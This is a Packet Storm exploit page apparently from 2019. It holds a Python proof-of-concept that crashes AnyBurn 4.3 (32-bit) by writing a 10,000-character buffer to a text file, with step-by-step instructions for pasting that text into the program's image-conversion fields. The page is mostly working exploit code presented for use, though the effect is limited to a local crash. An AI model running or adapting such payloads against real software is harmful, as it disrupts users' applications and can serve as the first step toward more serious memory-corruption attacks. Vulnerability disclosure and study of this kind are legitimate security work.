AnyBurn x86 version 4.3 suffers from a denial of service vulnerability.
f0b728371088f2c5e8db6b8d83c58786df87204d9660153e3bd8f547200264d1#!/usr/bin/python
# Exploit Title: AnyBurn x86 - Denial of Service (DoS)
# Date: 30-01-2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.anyburn.com/
# Version: 4.3 (32-bit)
# Software Link : https://www.anyburn.com/anyburn_setup.exe
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested Version: 4.3 (32-bit)
# Tested on: Windows XP SP3 ENG x86
# Note: The other exploitation field in Anyburn was discovered by Achilles
# CVE: TBC from Mitre
# Created in preparation for OSCE - DC - Telspace Systems
# DOS PoC:
# 1.) Generate exploit.txt, copy the contents to clipboard
# 2.) In the application, open 'Convert image to file format'
# 3.) Paste the contents of exploit.txt under 'Select source image file' and "Select Destination image file"
# 4.) Click "Convert Now" and the program crashes
buffer = "A" * 10000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed